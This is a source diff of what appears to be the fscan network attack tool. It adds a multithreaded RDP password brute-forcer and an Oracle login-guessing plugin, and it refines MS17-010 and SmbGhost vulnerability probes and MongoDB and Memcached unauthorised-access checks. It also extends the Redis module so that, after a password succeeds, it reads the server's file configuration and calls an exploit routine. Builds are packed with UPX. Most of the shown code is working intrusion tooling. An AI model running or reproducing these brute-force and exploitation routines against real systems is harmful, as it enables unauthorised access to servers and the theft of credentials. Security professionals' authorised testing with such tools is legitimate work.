poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程

feat(*): add `upx --best` for most elf

.github/conf/.goreleaser.yml

@@ -0,0 +1,73 @@
+before:
+  hooks:
+    - go mod tidy
+    - go generate ./...
+builds:
+  - id: "with-upx"
+    env:
+      - CGO_ENABLED=0
+    goos:
+      - linux
+      - windows
+      - darwin
+    goarch:
+      - amd64
+      - arm64
+      - arm
+      - "386"
+    goarm:
+      - "6"
+      - "7"
+    flags:
+      - -trimpath
+    ldflags:
+      - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser
+    ignore:
+      - goos: windows
+        goarch: arm64
+      - goos: windows
+        goarch: arm
+      - goos: linux
+        goarch: mips64
+    hooks:
+       post: upx --best -f -q "{{ .Path }}"
+
+# UnknownExecutableFormatException
+# CantPackException: can't pack new-exe
+  - id: "without-upx"
+    env:
+      - CGO_ENABLED=0
+    goos:
+      - linux
+      - windows
+    goarch:
+      - mips64
+      - arm
+    goarm:
+      - "6"
+      - "7"
+    flags:
+      - -trimpath
+    ldflags:
+      - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser
+    ignore:
+      - goos: linux
+        goarch: arm
+
+archives:
+  - replacements:
+      darwin: Darwin
+      linux: Linux
+      windows: Windows
+      386: i386
+      amd64: x86_64
+checksum:
+  name_template: 'checksums.txt'
+snapshot:
+  name_template: "{{ incpatch .Version }}-next"
+changelog:
+  sort: asc
+  filters:
+    exclude:
+      - '^docs:'
+      - '^test:'

.github/workflows/release.yml

@@ -0,0 +1,35 @@
+name: goreleaser
+
+on:
+  push:
+    tags:
+      - '*'
+
+permissions:
+  contents: write
+
+jobs:
+  goreleaser:
+    runs-on: ubuntu-latest
+    timeout-minutes: 60
+    steps:
+      -
+        name: Checkout
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0
+      -
+        name: Set up Go
+        uses: actions/setup-go@v2
+        with:
+          go-version: 1.17
+      -
+        name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v2
+        with:
+          distribution: goreleaser
+          version: latest
+          args: -f .github/conf/.goreleaser.yml
+          workdir: .
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

LICENSE.txt

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2021 shadow1ng
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

Plugins/CVE-2020-0796.go

@@ -96,6 +96,9 @@ const (
 )
 
 func SmbGhost(info *common.HostInfo) error {
+	if common.IsBrute {
+		return nil
+	}
 	err := SmbGhostScan(info)
 	return err
 }
@@ -104,6 +107,11 @@ func SmbGhostScan(info *common.HostInfo) error {
 	ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
 	addr := fmt.Sprintf("%s:%v", info.Host, port)
 	conn, err := net.DialTimeout("tcp", addr, timeout)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return err
 	}
@@ -117,7 +125,6 @@ func SmbGhostScan(info *common.HostInfo) error {
 	if err != nil {
 		return err
 	}
-	defer conn.Close()
 	if bytes.Contains(buff[:n], []byte("Public")) == true {
 		result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
 		common.LogSuccess(result)

Plugins/NetBIOS.go

@@ -76,6 +76,11 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 	}
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return
 	}
@@ -83,7 +88,6 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 	if err != nil {
 		return
 	}
-	defer conn.Close()
 
 	if info.Ports == "139" && len(payload0) > 0 {
 		_, err1 := conn.Write(payload0)
@@ -191,6 +195,11 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 	senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
 	realhost := fmt.Sprintf("%s:%v", info.Host, 137)
 	conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return
 	}
@@ -198,7 +207,6 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 	if err != nil {
 		return
 	}
-	defer conn.Close()
 	_, err = conn.Write(senddata1)
 	if err != nil {
 		return

Plugins/base.go

@@ -1,19 +1,22 @@
 package Plugins
 
 var PluginList = map[string]interface{}{
-	"21":      FtpScan,
-	"22":      SshScan,
-	"135":     Findnet,
-	"139":     NetBIOS,
-	"445":     SmbScan,
-	"1433":    MssqlScan,
-	"3306":    MysqlScan,
-	"5432":    PostgresScan,
-	"6379":    RedisScan,
-	"9000":    FcgiScan,
-	"11211":   MemcachedScan,
-	"27017":   MongodbScan,
-	"1000001": MS17010,
-	"1000002": SmbGhost,
-	"1000003": WebTitle,
+	"21":       FtpScan,
+	"22":       SshScan,
+	"135":      Findnet,
+	"139":      NetBIOS,
+	"445":      SmbScan,
+	"1433":     MssqlScan,
+	"1521":     OracleScan,
+	"3306":     MysqlScan,
+	"3389":     RdpScan,
+	"5432":     PostgresScan,
+	"6379":     RedisScan,
+	"9000":     FcgiScan,
+	"11211":    MemcachedScan,
+	"27017":    MongodbScan,
+	"1000001":  MS17010,
+	"1000002":  SmbGhost,
+	"1000003":  WebTitle,
+	"10000031": WebTitle,
 }

Plugins/fcgiscan.go

@@ -20,6 +20,9 @@ import (
 //https://github.com/wofeiwo/webcgi-exploits
 
 func FcgiScan(info *common.HostInfo) {
+	if common.IsBrute {
+		return
+	}
 	url := "/etc/issue"
 	if info.Path != "" {
 		url = info.Path
@@ -53,6 +56,11 @@ func FcgiScan(info *common.HostInfo) {
 	}
 
 	fcgi, err := New(addr, info.Timeout)
+	defer func() {
+		if fcgi.rwc != nil {
+			fcgi.rwc.Close()
+		}
+	}()
 	if err != nil {
 		errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
 		common.LogError(errlog)

Plugins/findnet.go

@@ -24,6 +24,11 @@ func Findnet(info *common.HostInfo) error {
 func FindnetScan(info *common.HostInfo) error {
 	realhost := fmt.Sprintf("%s:%v", info.Host, 135)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return err
 	}
@@ -31,7 +36,6 @@ func FindnetScan(info *common.HostInfo) error {
 	if err != nil {
 		return err
 	}
-	defer conn.Close()
 	_, err = conn.Write(bufferV1)
 	if err != nil {
 		return err
@@ -67,7 +71,7 @@ func read(text []byte, host string) error {
 	encodedStr := hex.EncodeToString(text)
 	hostnames := strings.Replace(encodedStr, "0700", "", -1)
 	hostname := strings.Split(hostnames, "000000")
-	result := "NetInfo:\n[*]" + host
+	result := "[+] NetInfo:\n[*]" + host
 	for i := 0; i < len(hostname); i++ {
 		hostname[i] = strings.Replace(hostname[i], "00", "", -1)
 		host, err := hex.DecodeString(hostname[i])

Plugins/ftp.go

@@ -9,6 +9,9 @@ import (
 )
 
 func FtpScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
 	starttime := time.Now().Unix()
 	flag, err := FtpConn(info, "anonymous", "")
 	if flag == true && err == nil {

Plugins/icmp.go

@@ -20,7 +20,7 @@ var (
 	livewg     sync.WaitGroup
 )
 
-func ICMPRun(hostslist []string, Ping bool) []string {
+func CheckLive(hostslist []string, Ping bool) []string {
 	chanHosts := make(chan string, len(hostslist))
 	go func() {
 		for ip := range chanHosts {
@@ -28,9 +28,9 @@ func ICMPRun(hostslist []string, Ping bool) []string {
 				ExistHosts[ip] = struct{}{}
 				if common.Silent == false {
 					if Ping == false {
-						fmt.Printf("(icmp) Target '%s' is alive\n", ip)
+						fmt.Printf("(icmp) Target %-15s is alive\n", ip)
 					} else {
-						fmt.Printf("(ping) Target '%s' is alive\n", ip)
+						fmt.Printf("(ping) Target %-15s is alive\n", ip)
 					}
 				}
 				AliveHosts = append(AliveHosts, ip)
@@ -50,9 +50,14 @@ func ICMPRun(hostslist []string, Ping bool) []string {
 		} else {
 			common.LogError(err)
 			//尝试无监听icmp探测
+			fmt.Println("trying RunIcmp2")
 			conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
+			defer func() {
+				if conn != nil {
+					conn.Close()
+				}
+			}()
 			if err == nil {
-				go conn.Close()
 				RunIcmp2(hostslist, chanHosts)
 			} else {
 				common.LogError(err)
@@ -66,6 +71,22 @@ func ICMPRun(hostslist []string, Ping bool) []string {
 
 	livewg.Wait()
 	close(chanHosts)
+
+	if len(hostslist) > 1000 {
+		arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true)
+		for i := 0; i < len(arrTop); i++ {
+			output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i])
+			common.LogSuccess(output)
+		}
+	}
+	if len(hostslist) > 256 {
+		arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false)
+		for i := 0; i < len(arrTop); i++ {
+			output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i])
+			common.LogSuccess(output)
+		}
+	}
+
 	return AliveHosts
 }
 
@@ -138,10 +159,14 @@ func RunIcmp2(hostslist []string, chanHosts chan string) {
 func icmpalive(host string) bool {
 	startTime := time.Now()
 	conn, err := net.DialTimeout("ip4:icmp", host, 6*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return false
 	}
-	defer conn.Close()
 	if err := conn.SetDeadline(startTime.Add(6 * time.Second)); err != nil {
 		return false
 	}
@@ -245,3 +270,49 @@ func genSequence(v int16) (byte, byte) {
 func genIdentifier(host string) (byte, byte) {
 	return host[0], host[1]
 }
+
+func ArrayCountValueTop(arrInit []string, length int, flag bool) (arrTop []string, arrLen []int) {
+	if len(arrInit) == 0 {
+		return
+	}
+	arrMap1 := make(map[string]int)
+	arrMap2 := make(map[string]int)
+	for _, value := range arrInit {
+		line := strings.Split(value, ".")
+		if len(line) == 4 {
+			if flag {
+				value = fmt.Sprintf("%s.%s", line[0], line[1])
+			} else {
+				value = fmt.Sprintf("%s.%s.%s", line[0], line[1], line[2])
+			}
+		}
+		if arrMap1[value] != 0 {
+			arrMap1[value]++
+		} else {
+			arrMap1[value] = 1
+		}
+	}
+	for k, v := range arrMap1 {
+		arrMap2[k] = v
+	}
+
+	i := 0
+	for _ = range arrMap1 {
+		var maxCountKey string
+		var maxCountVal = 0
+		for key, val := range arrMap2 {
+			if val > maxCountVal {
+				maxCountVal = val
+				maxCountKey = key
+			}
+		}
+		arrTop = append(arrTop, maxCountKey)
+		arrLen = append(arrLen, maxCountVal)
+		i++
+		if i >= length {
+			return
+		}
+		delete(arrMap2, maxCountKey)
+	}
+	return
+}

Plugins/memcached.go

@@ -11,6 +11,11 @@ import (
 func MemcachedScan(info *common.HostInfo) (err error) {
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if client != nil{
+			client.Close()
+		}
+	}()
 	if err == nil {
 		err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 		if err == nil {
@@ -23,7 +28,6 @@ func MemcachedScan(info *common.HostInfo) (err error) {
 						result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
 						common.LogSuccess(result)
 					}
-					client.Close()
 				} else {
 					errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
 					common.LogError(errlog)

Plugins/mongodb.go

@@ -10,6 +10,10 @@ import (
 )
 
 func MongodbScan(info *common.HostInfo) error {
+	if common.IsBrute {
+		return nil
+	}
+
 	_, err := MongodbUnauth(info)
 	if err != nil {
 		errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
@@ -20,14 +24,21 @@ func MongodbScan(info *common.HostInfo) error {
 
 func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
-	senddata := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
-	getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
+	senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return flag, err
+	}
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
-	defer conn.Close()
 	_, err = conn.Write(senddata)
 	if err != nil {
 		return flag, err
@@ -38,21 +49,10 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 		return flag, err
 	}
 	text := string(buf[0:count])
-	if strings.Contains(text, "ismaster") {
-		_, err = conn.Write(getlogdata)
-		if err != nil {
-			return flag, err
-		}
-		count, err := conn.Read(buf)
-		if err != nil {
-			return flag, err
-		}
-		text := string(buf[0:count])
-		if strings.Contains(text, "totalLinesWritten") {
-			flag = true
-			result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
-			common.LogSuccess(result)
-		}
+	if strings.Contains(text, "totalLinesWritten") {
+		flag = true
+		result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
+		common.LogSuccess(result)
 	}
 	return flag, err
 }

Plugins/ms17010.go

@@ -20,6 +20,9 @@ var (
 )
 
 func MS17010(info *common.HostInfo) error {
+	if common.IsBrute {
+		return nil
+	}
 	err := MS17010Scan(info)
 	if err != nil {
 		errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err)
@@ -29,15 +32,18 @@ func MS17010(info *common.HostInfo) error {
 }
 
 func MS17010Scan(info *common.HostInfo) error {
-
 	ip := info.Host
 	// connecting to a host in LAN if reachable should be very quick
 	conn, err := net.DialTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		//fmt.Printf("failed to connect to %s\n", ip)
 		return err
 	}
-	defer conn.Close()
 	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 	if err != nil {
 		//fmt.Printf("failed to connect to %s\n", ip)

Plugins/mssql.go

@@ -10,6 +10,9 @@ import (
 )
 
 func MssqlScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
 	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["mssql"] {
 		for _, pass := range common.Passwords {

Plugins/mysql.go

@@ -10,6 +10,9 @@ import (
 )
 
 func MysqlScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
 	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["mysql"] {
 		for _, pass := range common.Passwords {

Plugins/oracle.go

@@ -0,0 +1,57 @@
+package Plugins
+
+import (
+	"database/sql"
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	_ "github.com/sijms/go-ora/v2"
+	"strings"
+	"time"
+)
+
+func OracleScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+	starttime := time.Now().Unix()
+	for _, user := range common.Userdict["oracle"] {
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag, err := OracleConn(info, user, pass)
+			if flag == true && err == nil {
+				return err
+			} else {
+				errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
+				common.LogError(errlog)
+				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * info.Timeout) {
+					return err
+				}
+			}
+		}
+	}
+	return tmperr
+}
+
+func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
+	flag = false
+	Host, Port, Username, Password := info.Host, info.Ports, user, pass
+	dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
+	db, err := sql.Open("oracle", dataSourceName)
+	if err == nil {
+		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
+		db.SetMaxIdleConns(0)
+		defer db.Close()
+		err = db.Ping()
+		if err == nil {
+			result := fmt.Sprintf("[+] oracle:%v:%v:%v %v", Host, Port, Username, Password)
+			common.LogSuccess(result)
+			flag = true
+		}
+	}
+	return flag, err
+}

Plugins/portscan.go

@@ -4,6 +4,7 @@ import (
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
 	"net"
+	"sort"
 	"strconv"
 	"sync"
 	"time"
@@ -19,19 +20,21 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 	probePorts := common.ParsePort(ports)
 	noPorts := common.ParsePort(common.NoPorts)
 	if len(noPorts) > 0 {
-		tmp := make(map[int]struct{})
-		var tmpPorts []int
+		temp := map[int]struct{}{}
 		for _, port := range probePorts {
-			for _, noport := range noPorts {
-				if port != noport {
-					if _, ok := tmp[port]; !ok {
-						tmp[port] = struct{}{}
-						tmpPorts = append(tmpPorts, port)
-					}
-				}
-			}
+			temp[port] = struct{}{}
 		}
-		probePorts = tmpPorts
+
+		for _, port := range noPorts {
+			delete(temp, port)
+		}
+
+		var newDatas []int
+		for port, _ := range temp {
+			newDatas = append(newDatas, port)
+		}
+		probePorts = newDatas
+		sort.Ints(probePorts)
 	}
 	workers := common.Threads
 	Addrs := make(chan Addr, len(hostslist)*len(probePorts))
@@ -71,13 +74,46 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 
 func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
 	host, port := addr.ip, addr.port
-	con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+	conn, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err == nil {
-		con.Close()
 		address := host + ":" + strconv.Itoa(port)
 		result := fmt.Sprintf("%s open", address)
 		common.LogSuccess(result)
-		respondingHosts <- address
 		wg.Add(1)
+		respondingHosts <- address
 	}
 }
+
+func NoPortScan(hostslist []string, ports string) (AliveAddress []string) {
+	probePorts := common.ParsePort(ports)
+	noPorts := common.ParsePort(common.NoPorts)
+	if len(noPorts) > 0 {
+		temp := map[int]struct{}{}
+		for _, port := range probePorts {
+			temp[port] = struct{}{}
+		}
+
+		for _, port := range noPorts {
+			delete(temp, port)
+		}
+
+		var newDatas []int
+		for port, _ := range temp {
+			newDatas = append(newDatas, port)
+		}
+		probePorts = newDatas
+		sort.Ints(probePorts)
+	}
+	for _, port := range probePorts {
+		for _, host := range hostslist {
+			address := host + ":" + strconv.Itoa(port)
+			AliveAddress = append(AliveAddress, address)
+		}
+	}
+	return
+}

Plugins/postgres.go

@@ -10,6 +10,9 @@ import (
 )
 
 func PostgresScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
 	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["postgresql"] {
 		for _, pass := range common.Passwords {
@@ -43,7 +46,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
 		defer db.Close()
 		err = db.Ping()
 		if err == nil {
-			result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
+			result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
 			common.LogSuccess(result)
 			flag = true
 		}

Plugins/rdp.go

@@ -0,0 +1,198 @@
+package Plugins
+
+import (
+	"errors"
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	"github.com/tomatome/grdp/core"
+	"github.com/tomatome/grdp/glog"
+	"github.com/tomatome/grdp/protocol/nla"
+	"github.com/tomatome/grdp/protocol/pdu"
+	"github.com/tomatome/grdp/protocol/rfb"
+	"github.com/tomatome/grdp/protocol/sec"
+	"github.com/tomatome/grdp/protocol/t125"
+	"github.com/tomatome/grdp/protocol/tpkt"
+	"github.com/tomatome/grdp/protocol/x224"
+	"log"
+	"net"
+	"os"
+	"strconv"
+	"strings"
+	"sync"
+	"time"
+)
+
+type Brutelist struct {
+	user string
+	pass string
+}
+
+func RdpScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+
+	var wg sync.WaitGroup
+	var signal bool
+	var num = 0
+	var all = len(common.Userdict["rdp"]) * len(common.Passwords)
+	var mutex sync.Mutex
+	brlist := make(chan Brutelist, all)
+	port, _ := strconv.Atoi(info.Ports)
+
+	for _, user := range common.Userdict["rdp"] {
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			brlist <- Brutelist{user, pass}
+		}
+	}
+
+	for i := 0; i < common.BruteThread; i++ {
+		wg.Add(1)
+		go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
+	}
+
+	close(brlist)
+	go func() {
+		wg.Wait()
+		signal = true
+	}()
+	for !signal {
+	}
+
+	return tmperr
+}
+
+func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brutelist, signal *bool, num *int, all int, mutex *sync.Mutex, timeout int64) {
+	defer wg.Done()
+	for one := range brlist {
+		if *signal == true {
+			return
+		}
+		go incrNum(num, mutex)
+		user, pass := one.user, one.pass
+		flag, err := RdpConn(host, domain, user, pass, port, timeout)
+		if flag == true && err == nil {
+			var result string
+			if domain != "" {
+				result = fmt.Sprintf("[+] RDP:%v:%v:%v\\%v %v", host, port, domain, user, pass)
+			} else {
+				result = fmt.Sprintf("[+] RDP:%v:%v:%v %v", host, port, user, pass)
+			}
+			common.LogSuccess(result)
+			*signal = true
+			return
+		} else {
+			errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
+			common.LogError(errlog)
+		}
+	}
+}
+
+func incrNum(num *int, mutex *sync.Mutex) {
+	mutex.Lock()
+	*num = *num + 1
+	mutex.Unlock()
+}
+
+func RdpConn(ip, domain, user, password string, port int, timeout int64) (bool, error) {
+	target := fmt.Sprintf("%s:%d", ip, port)
+	g := NewClient(target, glog.NONE)
+	err := g.Login(domain, user, password, timeout)
+
+	if err == nil {
+		return true, nil
+	}
+
+	return false, err
+}
+
+type Client struct {
+	Host string // ip:port
+	tpkt *tpkt.TPKT
+	x224 *x224.X224
+	mcs  *t125.MCSClient
+	sec  *sec.Client
+	pdu  *pdu.Client
+	vnc  *rfb.RFB
+}
+
+func NewClient(host string, logLevel glog.LEVEL) *Client {
+	glog.SetLevel(logLevel)
+	logger := log.New(os.Stdout, "", 0)
+	glog.SetLogger(logger)
+	return &Client{
+		Host: host,
+	}
+}
+
+func (g *Client) Login(domain, user, pwd string, timeout int64) error {
+	conn, err := net.DialTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return fmt.Errorf("[dial err] %v", err)
+	}
+	glog.Info(conn.LocalAddr().String())
+
+	g.tpkt = tpkt.New(core.NewSocketLayer(conn), nla.NewNTLMv2(domain, user, pwd))
+	g.x224 = x224.New(g.tpkt)
+	g.mcs = t125.NewMCSClient(g.x224)
+	g.sec = sec.NewClient(g.mcs)
+	g.pdu = pdu.NewClient(g.sec)
+
+	g.sec.SetUser(user)
+	g.sec.SetPwd(pwd)
+	g.sec.SetDomain(domain)
+	//g.sec.SetClientAutoReconnect()
+
+	g.tpkt.SetFastPathListener(g.sec)
+	g.sec.SetFastPathListener(g.pdu)
+	g.pdu.SetFastPathSender(g.tpkt)
+
+	//g.x224.SetRequestedProtocol(x224.PROTOCOL_SSL)
+	//g.x224.SetRequestedProtocol(x224.PROTOCOL_RDP)
+
+	err = g.x224.Connect()
+	if err != nil {
+		return fmt.Errorf("[x224 connect err] %v", err)
+	}
+	glog.Info("wait connect ok")
+	wg := &sync.WaitGroup{}
+	breakFlag := false
+	wg.Add(1)
+
+	g.pdu.On("error", func(e error) {
+		err = e
+		glog.Error("error", e)
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("close", func() {
+		err = errors.New("close")
+		glog.Info("on close")
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("success", func() {
+		err = nil
+		glog.Info("on success")
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("ready", func() {
+		glog.Info("on ready")
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("update", func(rectangles []pdu.BitmapData) {
+		glog.Info("on update:", rectangles)
+	})
+	g.pdu.On("done", func() {
+		if breakFlag == false {
+			breakFlag = true
+			wg.Done()
+		}
+	})
+	wg.Wait()
+	return err
+}

Plugins/redis.go

@@ -10,12 +10,20 @@ import (
 	"time"
 )
 
+var (
+	dbfilename string
+	dir        string
+)
+
 func RedisScan(info *common.HostInfo) (tmperr error) {
 	starttime := time.Now().Unix()
 	flag, err := RedisUnauth(info)
 	if flag == true && err == nil {
 		return err
 	}
+	if common.IsBrute {
+		return
+	}
 	for _, pass := range common.Passwords {
 		pass = strings.Replace(pass, "{user}", "redis", -1)
 		flag, err := RedisConn(info, pass)
@@ -40,10 +48,18 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 	flag = false
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return flag, err
+	}
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
-	defer conn.Close()
 	_, err = conn.Write([]byte(fmt.Sprintf("auth %s\r\n", pass)))
 	if err != nil {
 		return flag, err
@@ -53,9 +69,16 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 		return flag, err
 	}
 	if strings.Contains(reply, "+OK") {
-		result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
-		common.LogSuccess(result)
 		flag = true
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
+			common.LogSuccess(result)
+			return flag, err
+		} else {
+			result := fmt.Sprintf("[+] Redis:%s %s file:%s/%s", realhost, pass, dir, dbfilename)
+			common.LogSuccess(result)
+		}
 		err = Expoilt(realhost, conn)
 	}
 	return flag, err
@@ -65,10 +88,18 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
